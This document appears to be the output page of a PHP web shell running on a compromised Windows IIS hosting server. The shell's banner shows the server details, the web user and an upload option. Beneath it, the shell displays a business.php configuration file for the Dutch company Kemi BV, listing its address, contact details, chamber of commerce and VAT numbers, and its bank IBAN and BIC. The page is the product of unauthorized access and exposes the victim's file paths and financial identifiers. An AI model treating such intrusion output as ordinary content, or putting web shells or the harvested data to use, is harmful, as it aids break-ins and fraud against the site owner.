HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/SBogers10/kemi.komma.pro/config/business.php
<?php

return [

    'googlex'    => '51.354466',
    'googley'    => '5.3860602',

    'company_name'  => 'Kemi BV',
    'address'       => 'Hennepstraat 8',
    'city'          => 'Riethoven',
    'zip'           => '5561 AC',
    'zip_with_country'           => 'NL-5561 AC',
    'phone_call'    => '0031402042255',
    'phone_display' => '+31 (0)40 204 22 55',
    'email'         => 'info@kemi.nl',

    'chamber_of_commerce' => '120.55.731',
    'vat_number'    => 'NL8107.78.634.B01',
    'bank_number'   => 'NL57 RABO 0135534607',
    'bic_number'    => 'RABONL2U',

    'send_errors' => [404, 500]
];